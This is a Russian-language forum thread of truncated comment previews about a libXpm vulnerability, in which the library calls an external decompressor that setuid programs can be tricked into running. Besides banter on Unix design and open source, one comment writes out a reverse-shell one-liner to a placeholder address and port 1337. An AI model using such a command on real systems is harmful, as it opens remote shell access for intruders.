Уязвимость в libXpm, приводящая к выполнению кода,
opennews (??), 21-Янв-23, (0) [смотреть все]
- Это кто такой умный ставит левым прогам суид-рут ,
Аноним (1), 11:12 , 21-Янв-23, (1) +2 //
- Libxpm классика, которая может всплыть где угодно, раньше вроде в x-сервере испо,
Аноним (4), 12:07 , 21-Янв-23, (4) //
- а спроси ни кто не заметил, что даже если дать local share TelegramDesktop lo,
dannyD (?), 18:19 , 21-Янв-23, (49) +1 //
- Потому что ты ничего не понимаешь Права на каталог TelegramDesktop - чьи Вот ч,
Аноним (1), 19:57 , 21-Янв-23, (55) +2 //
- спсзы я не админ, я оффтоп не люблю ззы совсем не люблю ,
dannyD (?), 20:23 , 21-Янв-23, (56)
- а можно чиста каннеретна _ _ что сделать, чтоб в файле нулевой длины l,
dannyD (?), 00:31 , 22-Янв-23, (79) +1
- Гугли setattr,
Perlovka (ok), 13:40 , 22-Янв-23, (100) +1
- частенько встречается такая задача, погасить неуёмное приложение Инструменты вс,
Аноним (1), 05:28 , 24-Янв-23, (115)
- sudo chattr ai path to file,
Аноним (119), 04:59 , 25-Янв-23, (119)
- А owner у него кто Chattr i ему поставь Или если не хочется чтобы там что-то б,
Аноним (-), 22:37 , 21-Янв-23, (64) +1 //
- спс, разорбрался конкретно телеграмм отказывается запускаться с отбитым логом ,
dannyD (?), 14:08 , 22-Янв-23, (101)
- очень, очень наглый кусок дуровкода а если залинковать это в dev null rm -f -,
ivan_erohin (?), 17:15 , 23-Янв-23, (107) +1
- разумеется сслыка будет прибита, а на ёё месте будет новый файл PS это первое, ,
dannyD (?), 22:12 , 23-Янв-23, (110)
- тоже самое с xsession-errors от lightdmлечится ковырянием сырца с переносом в,
dannyD (?), 22:19 , 23-Янв-23, (111)
- Ггг лол, ну, я бы если пользовался этим крапом вгрузил бы LD_PRELOAD ом libfxxxo,
Аноним (-), 04:23 , 24-Янв-23, (114)
- Ну а это вообще жесть ,
Аноним (1), 11:13 , 21-Янв-23, (2) +6
//
- По сути, не отличается от подмены утилиты или библиотеки на левую Вы обречены ,
Аноним (3), 12:01 , 21-Янв-23, (3) +3
//
- warning Пользователь может запустить под собой какую-то программу ,
An onymous (?), 12:43 , 21-Янв-23, (11) +5
//
- Warning Программа с suid бит может запустить под root какую-то программу вместо,
Аноним (40), 16:34 , 21-Янв-23, (40) +1
//
- А что за программа-то ,
Admino (ok), 18:00 , 21-Янв-23, (47)
- bash -i dev udp 1 2 3 4 1337 0 1,
OpenEcho (?), 18:36 , 21-Янв-23, (51)
- С правами рута и с использованием libXpm Отсыпь ,
Admino (ok), 19:38 , 21-Янв-23, (54)
- Но, тебе уже и так хватит Но если хочешь чтоб быстрей отпустило, дай доступ на,
OpenEcho (?), 19:35 , 23-Янв-23, (108)
- Так вот мне и интересно было, где это в дистрибутивах встречается графическая ту,
Admino (ok), 19:45 , 23-Янв-23, (109)
- А-а-а, вы о этом, сори, не понял к сожалению помимо безобидного текстового XP,
OpenEcho (?), 00:03 , 25-Янв-23, (117)
- Зачем ты привёл кучу текстовых утилит, которые к libXpm никаким боком отношения ,
Admino (ok), 00:08 , 25-Янв-23, (118)
- Это usr bin passwd текстовая утилита А мы разве не отошли он libXPM и говорим ,
OpenEcho (?), 19:55 , 25-Янв-23, (121)
- Это троллинг тупостью Да, usr bin passwd - это текстовая утилита Для эксплуата,
Admino (ok), 20:01 , 25-Янв-23, (122)
- О-о-о, понятно, еще один умный пуп, ну-ну смакуй дальше сам какой ты умный ,
OpenEcho (?), 00:28 , 26-Янв-23, (123)
- Ядро - одна большая чёрная дырка Остальные проги тоже, даже sudo который со вре,
Аноним (5), 12:11 , 21-Янв-23, (5) –7 //
- Без таких нытиков как ты - нормально жить,
Аноним (6), 12:22 , 21-Янв-23, (6)
- Зуммер узнал, что мир не идеален,
деанон (?), 12:39 , 21-Янв-23, (9) +4 //
- Хорошо жить на Винде 11,
Аноним (10), 12:41 , 21-Янв-23, (10) //
- А в стенах камеры ещё ,
Аноним (15), 13:12 , 21-Янв-23, (15)
- Ога, блин, выполняет запросы программ, такое сякое Если запросы программ не вып,
Аноним (-), 22:39 , 21-Янв-23, (65)
- Так что можно позапускать и виндовые трояны милые сердцу прожженого маздайца Ту,
Аноним (-), 00:39 , 22-Янв-23, (82)
- Ну они скоро подарят всяким докерам фичу невозможности пользователю менять перем,
Ананоним (?), 13:08 , 21-Янв-23, (14) //
- Ну это вообще смузикод из 80ых что-ли system gzip my shit А всё потому ч,
InuYasha (??), 13:25 , 21-Янв-23, (16) //
- А как ты себе это представляешь в принципе Абсолютно все утилиты на компе должн,
Аноним (21), 14:19 , 21-Янв-23, (21) //
- В Винде можно dll связать с другой dll В java можно динамически загружать нативн,
Аноним (40), 14:52 , 21-Янв-23, (27) //
- Офигеть, вот это круто Это dlopen что-ли ,
Аноним (21), 19:14 , 21-Янв-23, (53) +1
- ну вон в винде дллки также инжектят разница-то в чем ,
Sw00p aka Jerom (?), 20:38 , 21-Янв-23, (57) +1
- Потому что unix это не винда,
Аноним (63), 22:34 , 21-Янв-23, (63)
- В Linux тоже так можно И чего Да охренеть В нативных программах, только подума,
Аноним (-), 22:47 , 21-Янв-23, (71)
- В идеальном мире - примерно да Функции, алгоритмы, код - в ДЛЛках, CLI и фронте,
InuYasha (??), 14:55 , 21-Янв-23, (29)
- В данном случае распаковка не является задачей libXpm Программа может напрямую ,
Аноним (45), 17:13 , 21-Янв-23, (45)
- В полноценных операционных системах еще с 90х годов у каждой программы нужные би,
Аноним (70), 22:45 , 21-Янв-23, (70) +2
- Гос пади, xpm - это битмапы в формате сишного массива что-ли JSON и смузихлёбст,
InuYasha (??), 13:30 , 21-Янв-23, (17) //
- И я его обожаю В CDE божественные xpm ные иконки,
Аноним (21), 14:20 , 21-Янв-23, (22) //
- Дело не в xpm, а что тебе кто-то может ls, например, подменить, а ты потом sudo ,
Аноним (1), 14:24 , 21-Янв-23, (23) +2 //
- Очень хорошая архитектура, настоящие программисты на си, превзошли сами себя,
Аноним (40), 14:42 , 21-Янв-23, (24) –2 //
- Хотя я тоже писала код запускающий внешний исполняемый файл для ковертации, кото,
Аноним (40), 15:07 , 21-Янв-23, (32)
- А что не так У вас там в расте особенности работы с памятью, а у нас особенност,
Аноним (21), 18:05 , 21-Янв-23, (48)
- Верно, классическая UNIX, позволяет менять алгоритм сжатия без изменения кода пр,
Аноним (63), 22:40 , 21-Янв-23, (66) //
- Может быть истинно понятная и безопасная ОС и должна так работать, без всяких шу,
kusb (?), 14:43 , 23-Янв-23, (106)
- Вон из профессии за такое решение Вон из профессии за такой фикс ,
Аноним (25), 14:44 , 21-Янв-23, (25) –2 //
- при обработке файлов XPM Z или XPM gz библиотека при помощи вызова execlp запу,
Омномним (?), 15:03 , 21-Янв-23, (30) +2 //
- Офигенный код и офигенный фикс Кто там пыхеров и жсников за eval ругал Ваш вы,
Анонн (?), 16:15 , 21-Янв-23, (38) +2 //
- А ведь можно было использовать библиотеки реализующие декомпрессию z gz и не выз,
Аноним (44), 17:09 , 21-Янв-23, (43) //
- Блеск и нищета опенсорса Врачи пишут планировщики задач, студни и всякие бoмжы п,
Аноним (-), 22:11 , 21-Янв-23, (61) //
- Зато в ынтерпрайзе всё не так Сеньёры молятся на новые версии библиотек и дают ,
Аноним (62), 22:17 , 21-Янв-23, (62) +1 //
- В ынтерплайзе никто не будет писать либу просто так По крайней мере в рабочее в,
Аноним (-), 22:40 , 21-Янв-23, (67) –2 //
- Свободный и бесплатный это разные вещи ,
Аноним (63), 22:42 , 21-Янв-23, (69)
- А я и не утверждал, что это одинаковые вещи Просто настоящих идейных крайне мало,
Аноним (-), 22:59 , 21-Янв-23, (73)
- Это же все видно Посмотрите сколько пользователей у того же firefox, и сколько у,
Аноним (-), 23:09 , 21-Янв-23, (74) +1
- Свобода, за которую надо платить - это платная временная вольная от хозяинаПо ко,
Бывалый смузихлёб (?), 05:26 , 22-Янв-23, (86)
- Раньше на сайте Криты писалась сумма пожертвований Потом вроде убрали, чтобы не,
Аноним (92), 09:50 , 22-Янв-23, (93)
- дык за деньги жев отечественном ынтерпрайзе токо и делают, что используют беспла,
Аноним (3), 23:35 , 21-Янв-23, (76)
- АХАХАХАХА,
Аноним (78), 23:46 , 21-Янв-23, (78) +2
- Однако в лицензиях проприетарного софта почему-то написано про AS IS Да, некото,
Аноним (-), 00:41 , 22-Янв-23, (83)
- То-то у ынтерплайза сейчас версионная диарея ,
Аноним (1), 00:50 , 22-Янв-23, (84)
- Ну почему же, вполне будет Только если это не согласовано с конторой, либо будут,
Бывалый смузихлёб (?), 05:31 , 22-Янв-23, (87)
- D D D D D Не реально смешно Чел никогда не видел ынтерплайза Зачастую, он,
хрю (?), 14:23 , 22-Янв-23, (102) +2
- Святая наивность, ты никогда не видел коммерческой разработки изнутри ,
Аноним (34), 01:42 , 22-Янв-23, (85) +1
- https xkcd com 2347 ,
Аноним (96), 12:01 , 22-Янв-23, (98)
- Странно, что не написали сколько лет этой уязвимости ,
Alex (??), 06:13 , 22-Янв-23, (88) –1 //
- Угар, конечно, как в тут папуасы ругают классику программирования под юникс 82,
Аноним (119), 05:12 , 25-Янв-23, (120)
1,2,5,14,16,17,24,25,30,38,43,61,88,120
|
Вариант для распечатки
